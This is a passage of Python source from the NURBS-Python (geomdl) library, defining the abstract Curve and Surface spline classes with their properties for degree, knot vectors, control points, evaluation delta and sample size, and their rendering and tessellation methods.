Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the delta value
:setter: Sets the delta value
:type: float
"""
return self._delta[0]
@delta.setter
def delta(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Curve evaluation delta should be between 0.0 and 1.0")
# Clean up the curve points list
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=[self.ctrlpts_size],
control_points=self._control_points
)
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
"""
# It is not necessary to input args for curves
if not args:
args = [len(ctrlpts)]
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
# Clean up the curve and control points lists
self.reset(ctrlpts=True, evalpts=True)
# Call parent function
super(Curve, self).set_ctrlpts(ctrlpts, **kwargs)
def render(self, **kwargs):
""" Renders the curve using the visualization component
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points polygon
* ``evalcolor``: sets the color of the curve
* ``bboxcolor``: sets the color of the bounding box
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``extras``: adds line plots to the figure. *Default: None*
``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'black')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Check all parameters are set
self._check_variables()
# Check if the curve has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Control points
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Evaluated points
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm = (max(self.knotvector) + min(self.knotvector)) / 2.0
midpt = self.evaluate_single(midprm)
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
* ``ctrlpts`` if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
# Checks whether the curve evaluation is possible or not
def _check_variables(self):
works = True
param_list = []
if self.degree == 0:
works = False
param_list.append('degree')
if self._control_points is None or len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if self.knotvector is None or len(self.knotvector) == 0:
works = False
param_list.append('knotvector')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the curve.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the curve evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the curve at the given parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param: parameter (u)
"""
# Check all variables are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the curve for an input range of parameters.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param_list: array of parameters
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def derivatives(self, u, order, **kwargs):
""" Evaluates the derivatives of the curve at parameter u.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param u: parameter (u)
:type u: float
:param order: derivative order
:type order: int
"""
# Check all variables are set before the curve evaluation
self._check_variables()
# Check parameters
if self._kv_normalize:
if not utilities.check_params([u]):
raise GeomdlException("Parameters should be between 0 and 1")
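# Hedged helper (not part of the geomdl API; added for illustration): the
# sample_size getters above derive a point count from an evaluation delta
# over a [start, stop] parametric domain, e.g. delta=0.01 on [0, 1] -> 101.
def _sample_size_from_delta(delta, start=0.0, stop=1.0):
    return int((stop - start) / delta) + 1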
@six.add_metaclass(abc.ABCMeta)
class Surface(SplineGeometry):
""" Abstract base class for defining spline surfaces.
Surface ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Surface ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func``
keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the
FindSpan function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Surface abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MySurfaceClass(abstract.Surface):
def __init__(self, **kwargs):
super(MySurfaceClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uv):
# Implement this function
pass
def evaluate_list(self, uv_list):
# Implement this function
pass
def derivatives(self, u, v, order, **kwargs):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 2 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.05 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Surface, self).__init__(**kwargs)
self._name = "Surface" # descriptor field
self._tsl_component = None # tessellation component
self._trims = self._init_array() # trim curves
@property
def order_u(self):
""" Order for the u-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets order for the u-direction
:setter: Sets order for the u-direction
:type: int
"""
return self.degree_u + 1
@order_u.setter
def order_u(self, value):
self.degree_u = value - 1
@property
def order_v(self):
""" Order for the v-direction.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets surface order for the v-direction
:setter: Sets surface order for the v-direction
:type: int
"""
return self.degree_v + 1
@order_v.setter
def order_v(self, value):
self.degree_v = value - 1
@property
def degree(self):
""" Degree for u- and v-directions
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.degree_u = value[0]
self.degree_v = value[1]
@property
def degree_u(self):
""" Degree for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the u-direction
:setter: Sets degree for the u-direction
:type: int
"""
return self._degree[0]
@degree_u.setter
def degree_u(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree u
self._degree[0] = int(value)
@property
def degree_v(self):
""" Degree for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets degree for the v-direction
:setter: Sets degree for the v-direction
:type: int
"""
return self._degree[1]
@degree_v.setter
def degree_v(self, value):
val = int(value)
if val <= 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the surface points
self.reset(evalpts=True)
# Set degree v
self._degree[1] = val
@property
def knotvector(self):
""" Knot vector for u- and v-directions
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
if not isinstance(value, (list, tuple)):
raise ValueError("Please input a list with a length of " + str(self.pdimension))
self.knotvector_u = value[0]
self.knotvector_v = value[1]
@property
def knotvector_u(self):
""" Knot vector for the u-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the u-direction
:setter: Sets knot vector for the u-direction
:type: list
"""
return self._knot_vector[0]
@knotvector_u.setter
def knotvector_u(self, value):
if self.degree_u == 0 or self.ctrlpts_size_u == 0:
raise ValueError("Set degree and control points first for the u-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u):
raise ValueError("Input is not a valid knot vector for the u-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def knotvector_v(self):
""" Knot vector for the v-direction.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets knot vector for the v-direction
:setter: Sets knot vector for the v-direction
:type: list
"""
return self._knot_vector[1]
@knotvector_v.setter
def knotvector_v(self, value):
if self.degree_v == 0 or self.ctrlpts_size_v == 0:
raise ValueError("Set degree and control points first for the v-direction")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v):
raise ValueError("Input is not a valid knot vector for the v-direction")
# Clean up the surface points
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" 1-dimensional array of control points.
.. note::
The v index varies first. That is, a row of v control points for the first u value is found first.
Then, the row of v control points for the next u value.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0:
raise ValueError("Please set the number of control points on the u- and v-directions")
self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v)
@property
def ctrlpts_size_u(self):
""" Number of control points for the u-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points for the u-direction
:setter: Sets number of control points for the u-direction
"""
return self._control_points_size[0]
@ctrlpts_size_u.setter
def ctrlpts_size_u(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points for the u-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[0] = value
@property
def ctrlpts_size_v(self):
""" Number of control points for the v-direction.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets number of control points on the v-direction
:setter: Sets number of control points on the v-direction
"""
return self._control_points_size[1]
@ctrlpts_size_v.setter
def ctrlpts_size_v(self, value):
if not isinstance(value, int):
raise TypeError("Number of control points on the v-direction must be an integer number")
if value <= 0:
raise ValueError("Control points size cannot be less than and equal to zero")
# Assume that user is doing this right
self._control_points_size[1] = value
@property
def sample_size_u(self):
""" Sample size for the u-direction.
Sample size defines the number of surface points to generate. It also sets the ``delta_u`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the u-direction
:setter: Sets sample size for the u-direction
:type: int
"""
return int(1.0 / self.delta_u) + 1
@sample_size_u.setter
def sample_size_u(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0:
warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u+1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
@property
def sample_size_v(self):
""" Sample size for the v-direction.
Sample size defines the number of surface points to generate. It also sets the ``delta_v`` property.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size for the v-direction
:setter: Sets sample size for the v-direction
:type: int
"""
return int(1.0 / self.delta_v) + 1
@sample_size_v.setter
def sample_size_v(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0:
warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v+1)]
# Set delta values
self.delta_v = (stop_v - start_v) / float(value - 1)
@property
def sample_size(self):
""" Sample size for both u- and v-directions.
Sample size defines the number of surface points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size as a tuple of values corresponding to u- and v-directions
:setter: Sets sample size for both u- and v-directions
:type: int
"""
sample_size_u = int(1.0 / self.delta_u) + 1
sample_size_v = int(1.0 / self.delta_v) + 1
return sample_size_u, sample_size_v
@sample_size.setter
def sample_size(self, value):
if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or\
(self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0):
warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start_u = self.knotvector_u[self.degree_u]
stop_u = self.knotvector_u[-(self.degree_u+1)]
start_v = self.knotvector_v[self.degree_v]
stop_v = self.knotvector_v[-(self.degree_v+1)]
# Set delta values
self.delta_u = (stop_u - start_u) / float(value - 1)
self.delta_v = (stop_v - start_v) / float(value - 1)
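    # Relationship sketch between ``delta`` and ``sample_size`` (comments only,
    # since this is an abstract class; a concrete subclass instance ``surf`` is
    # assumed): with a clamped knot vector on [0, 1], ``surf.sample_size_u = 20``
    # stores ``delta_u = (1.0 - 0.0) / 19`` and the getter above recovers
    # ``int(1.0 / delta_u) + 1 == 20``.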
@property
def delta_u(self):
""" Evaluation delta for the u-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
        Therefore, the smaller the delta value, the smoother the surface.
Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the u-direction
:setter: Sets evaluation delta for the u-direction
:type: float
"""
return self._delta[0]
@delta_u.setter
def delta_u(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Surface evaluation delta (u-direction) must be between 0.0 and 1.0")
# Clean up the surface points
self.reset(evalpts=True)
# Set new delta value
self._delta[0] = float(value)
@property
def delta_v(self):
""" Evaluation delta for the v-direction.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
        Therefore, the smaller the delta value, the smoother the surface.
Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta for the v-direction
:setter: Sets evaluation delta for the v-direction
:type: float
"""
return self._delta[1]
@delta_v.setter
def delta_v(self, value):
# Delta value for surface evaluation should be between 0 and 1
if float(value) <= 0 or float(value) >= 1:
raise ValueError("Surface evaluation delta (v-direction) should be between 0.0 and 1.0")
# Clean up the surface points
self.reset(evalpts=True)
# Set new delta value
self._delta[1] = float(value)
@property
def delta(self):
""" Evaluation delta for both u- and v-directions.
Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to
generate surface points. Decreasing step size results in generation of more surface points.
        Therefore, the smaller the delta value, the smoother the surface.
Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different
descriptions. Therefore, setting ``delta`` will also set ``sample_size``.
The following figure illustrates the working principles of the delta property:
.. math::
            \\left[{{u_{start}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets evaluation delta as a tuple of values corresponding to u- and v-directions
:setter: Sets evaluation delta for both u- and v-directions
:type: float
"""
return self.delta_u, self.delta_v
@delta.setter
def delta(self, value):
if isinstance(value, (int, float)):
self.delta_u = value
self.delta_v = value
elif isinstance(value, (list, tuple)):
if len(value) == 2:
self.delta_u = value[0]
self.delta_v = value[1]
else:
raise ValueError("Surface requires 2 delta values")
else:
raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 2 numeric values")
@property
def tessellator(self):
""" Tessellation component.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the tessellation component
:setter: Sets the tessellation component
"""
return self._tsl_component
@tessellator.setter
def tessellator(self, value):
if not isinstance(value, AbstractTessellate):
warnings.warn("Tessellation component must be an instance of AbstractTessellate class")
return
self._tsl_component = value
@property
def trims(self):
""" Trim curves.
        Trim curves are introduced to the surfaces on the parametric space. The input should be an array (or list,
        tuple, etc.) of curves, and they are integrated into the existing visualization system.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the array of trim curves
:setter: Sets the array of trim curves
"""
return self._trims
@trims.setter
def trims(self, value):
# Input validity check
for i, v in enumerate(value):
if not isinstance(v, Geometry):
raise GeomdlException(
"Trim curve must be an instance of abstract.Geometry class",
data=dict(idx=i)
)
self._trims = value
@property
def data(self):
""" Returns a dictionary containing all shape data.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
"""
return dict(
rational=self.rational,
dimension=self.dimension,
degree=self._degree,
knotvector=self._knot_vector,
size=self._control_points_size,
control_points=self._control_points
)
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets the control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
.. note::
The v index varies first. That is, a row of v control points for the first u value is found first.
Then, the row of v control points for the next u value.
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple[int, int]
"""
# Validate input
for arg, degree in zip(args, self._degree):
if degree <= 0:
raise ValueError("Set the degree first")
if arg < degree + 1:
raise ValueError("Number of control points should be at least degree + 1")
# Clean up the surface and control points
self.reset(evalpts=True, ctrlpts=True)
# Call parent function
super(Surface, self).set_ctrlpts(ctrlpts, *args, **kwargs)
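    # Ordering sketch for ``set_ctrlpts`` (the v index varies first, per the
    # note in the docstring above): a hypothetical 2x3 grid is passed as
    #   pts = [P(u0,v0), P(u0,v1), P(u0,v2), P(u1,v0), P(u1,v1), P(u1,v2)]
    #   surf.set_ctrlpts(pts, 2, 3)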
def render(self, **kwargs):
""" Renders the surface using the visualization component.
The visualization component must be set using :py:attr:`~vis` property before calling this method.
Keyword Arguments:
* ``cpcolor``: sets the color of the control points grid
* ``evalcolor``: sets the color of the surface
* ``trimcolor``: sets the color of the trim curves
* ``filename``: saves the plot with the input name
* ``plot``: controls plot window visibility. *Default: True*
* ``animate``: activates animation (if supported). *Default: False*
* ``extras``: adds line plots to the figure. *Default: None*
* ``colormap``: sets the colormap of the surface
The ``plot`` argument is useful when you would like to work on the command line without any window context.
If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables
plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the
configuration class.
``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts
in the format described below:
.. code-block:: python
:linenos:
[
dict( # line plot 1
points=[[1, 2, 3], [4, 5, 6]], # list of points
name="My line Plot 1", # name displayed on the legend
color="red", # color of the line plot
size=6.5 # size of the line plot
),
dict( # line plot 2
points=[[7, 8, 9], [10, 11, 12]], # list of points
name="My line Plot 2", # name displayed on the legend
color="navy", # color of the line plot
size=12.5 # size of the line plot
)
]
Please note that ``colormap`` argument can only work with visualization classes that support colormaps. As an
example, please see :py:class:`.VisMPL.VisSurfTriangle()` class documentation. This method expects a single
colormap input.
"""
if not self._vis_component:
warnings.warn("No visualization component has been set")
return
cpcolor = kwargs.get('cpcolor', 'blue')
evalcolor = kwargs.get('evalcolor', 'green')
bboxcolor = kwargs.get('bboxcolor', 'darkorange')
trimcolor = kwargs.get('trimcolor', 'black')
filename = kwargs.get('filename', None)
plot_visible = kwargs.get('plot', True)
extra_plots = kwargs.get('extras', None)
animate_plot = kwargs.get('animate', False)
# Get colormap and convert to a list
surf_cmap = kwargs.get('colormap', None)
surf_cmap = [surf_cmap] if surf_cmap else []
# Check all parameters are set
self._check_variables()
# Check if the surface has been evaluated
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
# Clear the visualization component
self._vis_component.clear()
# Add control points
if self._vis_component.mconf['ctrlpts'] == 'points':
self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add control points as quads
if self._vis_component.mconf['ctrlpts'] == 'quads':
ctrlpts_quads = utilities.make_quad(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v)
self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add control points as a quad mesh
if self._vis_component.mconf['ctrlpts'] == 'quadmesh':
ctrlpts_quads = utilities.make_quad_mesh(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v)
self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts')
# Add surface points
if self._vis_component.mconf['evalpts'] == 'points':
self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts')
# Add surface points as quads
if self._vis_component.mconf['evalpts'] == 'quads':
evalpts_quads = utilities.make_quad(self.evalpts, self.sample_size_u, self.sample_size_v)
self._vis_component.add(ptsarr=evalpts_quads, name=self.name, color=evalcolor, plot_type='evalpts')
# Add surface points as vertices and triangles
if self._vis_component.mconf['evalpts'] == 'triangles':
self.tessellate()
self._vis_component.add(ptsarr=[self.tessellator.vertices, self.tessellator.faces],
name=self.name, color=evalcolor, plot_type='evalpts')
# Visualize the trim curve
for idx, trim in enumerate(self._trims):
self._vis_component.add(ptsarr=self.evaluate_list(trim.evalpts),
name="Trim Curve " + str(idx + 1), color=trimcolor, plot_type='trimcurve')
# Bounding box
self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox')
# User-defined plots
if extra_plots is not None:
for ep in extra_plots:
self._vis_component.add(ptsarr=ep['points'], name=ep['name'],
color=(ep['color'], ep['size']), plot_type='extras')
# Data requested by the visualization module
if self._vis_component.mconf['others']:
vis_other = self._vis_component.mconf['others'].split(",")
for vo in vis_other:
vo_clean = vo.strip()
# Send center point of the parametric space to the visualization module
if vo_clean == "midpt":
midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0
midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0
midpt = self.evaluate_single((midprm_u, midprm_v))
self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean)
# Display the figure
if animate_plot:
self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap)
else:
self._vis_component.render(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap)
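    # Rendering sketch (assumes a concrete subclass and a Matplotlib-based
    # visualization module such as ``geomdl.visualization.VisMPL``; the
    # colormap import is an assumption as well):
    #   from matplotlib import cm
    #   surf.vis = VisMPL.VisSurfTriangle()
    #   surf.render(colormap=cm.coolwarm, plot=False, filename="surface.png")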
def tessellate(self, **kwargs):
""" Tessellates the surface.
Keyword arguments are directly passed to the tessellation component.
"""
# No need to re-tessellate if we have already tessellated the surface
if self._tsl_component.is_tessellated():
return
        # Remove caller-supplied kwargs that this method sets explicitly below
kwlist = ["size_u", "size_v", "trims"]
for kw in kwlist:
if kw in kwargs:
kwargs.pop(kw)
# Call tessellation component for vertex and triangle generation
self._tsl_component.tessellate(self.evalpts, size_u=self.sample_size_u, size_v=self.sample_size_v,
trims=self.trims, **kwargs)
# Re-evaluate vertex coordinates
for idx in range(len(self._tsl_component.vertices)):
self._tsl_component.vertices[idx].data = self.evaluate_single(self._tsl_component.vertices[idx].uv)
def reset(self, **kwargs):
""" Resets control points and/or evaluated points.
Keyword Arguments:
* ``evalpts``: if True, then resets evaluated points
        * ``ctrlpts``: if True, then resets control points
"""
reset_ctrlpts = kwargs.get('ctrlpts', False)
reset_evalpts = kwargs.get('evalpts', False)
if reset_ctrlpts:
self._control_points = self._init_array()
self._control_points_size[0] = 0
self._control_points_size[1] = 0
self._bounding_box = self._init_array()
if reset_evalpts:
self._eval_points = self._init_array()
# Reset vertices and triangles
self._tsl_component.reset()
    def _check_variables(self):
        """ Checks whether the surface evaluation is possible or not. """
works = True
param_list = []
if self.degree_u == 0:
works = False
param_list.append('degree_u')
if self.degree_v == 0:
works = False
param_list.append('degree_v')
if len(self._control_points) == 0:
works = False
param_list.append('ctrlpts')
if len(self.knotvector_u) == 0:
works = False
param_list.append('knotvector_u')
if len(self.knotvector_v) == 0:
works = False
param_list.append('knotvector_v')
if not works:
raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list))
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Evaluates the parametric surface.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def evaluate_single(self, param):
""" Evaluates the parametric surface at the given (u, v) parameter.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param: parameter (u, v)
"""
# Check all variables are set before the evaluation
self._check_variables()
if isinstance(param, (int, float)):
param = [float(param) for _ in range(self.pdimension)]
# Check parameters
if self._kv_normalize:
if not utilities.check_params(param):
raise GeomdlException("Parameters should be between 0 and 1")
@abc.abstractmethod
def evaluate_list(self, param_list):
""" Evaluates the parametric surface for an input range of (u, v) parameters.
.. note::
This is an abstract method and it must be implemented in the subclass.
:param param_list: array of parameters (u, v)
"""
# Check all parameters are set before the evaluation
self._check_variables()
@abc.abstractmethod
def derivatives(self, u, v, order, **kwargs):
